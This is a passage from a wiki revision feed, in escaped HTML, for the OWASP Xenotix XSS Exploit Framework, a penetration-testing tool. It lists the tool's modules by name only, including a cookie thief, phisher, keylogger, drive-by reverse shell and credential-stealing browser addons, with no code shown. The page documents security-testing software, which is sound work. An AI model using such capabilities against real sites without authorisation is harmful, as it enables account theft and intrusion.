&lt;br /&gt;
[[Image:Download.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
* [[OWASP_AntiSamy_Project]]&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Manual Mode&lt;br /&gt;
*GET Request Auto Mode&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
*Multiple Parameter Scanner&lt;br /&gt;
*POST Request Scanner&lt;br /&gt;
*Request Repeater&lt;br /&gt;
*URL Fuzzer&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
*Browser Fingerprinting&lt;br /&gt;
*Browser Features Detector&lt;br /&gt;
*Get Network IP&lt;br /&gt;
*Ping Scan&lt;br /&gt;
*Port Scan&lt;br /&gt;
*Internal Network Scan&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Phisher&lt;br /&gt;
*Tabnabbing&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*Gram WebCam Screenshot&lt;br /&gt;
*Executable Drive By&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Drive-By Reverse Shell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Firefox Reverse Shell Addon (Persistent)&lt;br /&gt;
*Firefox Session Stealer Addon (Persistent)&lt;br /&gt;
*Firefox Keylogger Addon (Persistent)&lt;br /&gt;
*Firefox DDoSer Addon (Persistent)&lt;br /&gt;
*Firefox Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
*Firefox Download and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''UTILITY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Payload Encoder&lt;br /&gt;
*JavaScript Beautify&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
'''ClubHack 2013'''&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png||530px|thumb|Xenotix POST Request Scanner ]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png||530px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|530px|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|530px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Download.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]&lt;br /&gt;
&lt;br /&gt;
Requirements&lt;br /&gt;
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718&lt;br /&gt;
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Version 5 Videos'''&lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework v5{{#ev:youtube|loZSdedJnqc}}&lt;br /&gt;
&lt;br /&gt;
'''Version 4.5 Videos'''&lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework v4.5{{#ev:youtube|jm1-_nTlhzY}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 4 Videos'''&lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework v4{{#ev:youtube|dCo5BCJWOdA}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 3 Videos'''&lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework v3: XSS Scanner Module{{#ev:youtube|CJEgO4_kd-8}} &lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework v3: XSS Keylogger{{#ev:youtube|owfF9C_Xerw}} &lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework v3: XSS Executable Drive-By{{#ev:youtube|i8c3kf4t6A8}} &lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework v3: XSS Reverse Shell{{#ev:youtube|IT-8IH3yRrA}} &lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework v3: XSS DDoSer{{#ev:youtube|cgLGgVWvi9Y}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 2 Videos'''&lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework Version 2 {{#ev:youtube|ei1ny7L8-8k}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{:Projects/OWASP Xenotix XSS Exploit Framework | Project About}}&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=168013</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=168013"/>
				<updated>2014-02-12T22:00:18Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework 5==&lt;br /&gt;
&lt;br /&gt;
[[Image:XenotixV5.png|left|600px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world’s 2nd largest XSS Payloads of about 1600+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. Xenotix Scripting Engine allows you to create custom test cases and addons over the Xenotix API. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Download.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
* [[OWASP_AntiSamy_Project]]&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Manual Mode&lt;br /&gt;
*GET Request Auto Mode&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
*Multiple Parameter Scanner&lt;br /&gt;
*POST Request Scanner&lt;br /&gt;
*Request Repeater&lt;br /&gt;
*URL Fuzzer&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
*Browser Fingerprinting&lt;br /&gt;
*Browser Features Detector&lt;br /&gt;
*Get Network IP&lt;br /&gt;
*Ping Scan&lt;br /&gt;
*Port Scan&lt;br /&gt;
*Internal Network Scan&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Phisher&lt;br /&gt;
*Tabnabbing&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*Gram WebCam Screenshot&lt;br /&gt;
*Executable Drive By&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Drive-By Reverse Shell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Firefox Reverse Shell Addon (Persistent)&lt;br /&gt;
*Firefox Session Stealer Addon (Persistent)&lt;br /&gt;
*Firefox Keylogger Addon (Persistent)&lt;br /&gt;
*Firefox DDoSer Addon (Persistent)&lt;br /&gt;
*Firefox Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
*Firefox Download and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''UTILITY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Payload Encoder&lt;br /&gt;
*JavaScript Beautify&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
'''ClubHack 2013'''&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png||530px|thumb|Xenotix POST Request Scanner ]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png||530px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|530px|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|530px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Download.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]&lt;br /&gt;
&lt;br /&gt;
Requirements&lt;br /&gt;
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718&lt;br /&gt;
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Version 4.5 Videos'''&lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework v4.5{{#ev:youtube|jm1-_nTlhzY}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 4 Videos'''&lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework v4{{#ev:youtube|dCo5BCJWOdA}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 3 Videos'''&lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework v3: XSS Scanner Module{{#ev:youtube|CJEgO4_kd-8}} &lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework v3: XSS Keylogger{{#ev:youtube|owfF9C_Xerw}} &lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework v3: XSS Executable Drive-By{{#ev:youtube|i8c3kf4t6A8}} &lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework v3: XSS Reverse Shell{{#ev:youtube|IT-8IH3yRrA}} &lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework v3: XSS DDoSer{{#ev:youtube|cgLGgVWvi9Y}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 2 Videos'''&lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework Version 2 {{#ev:youtube|ei1ny7L8-8k}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
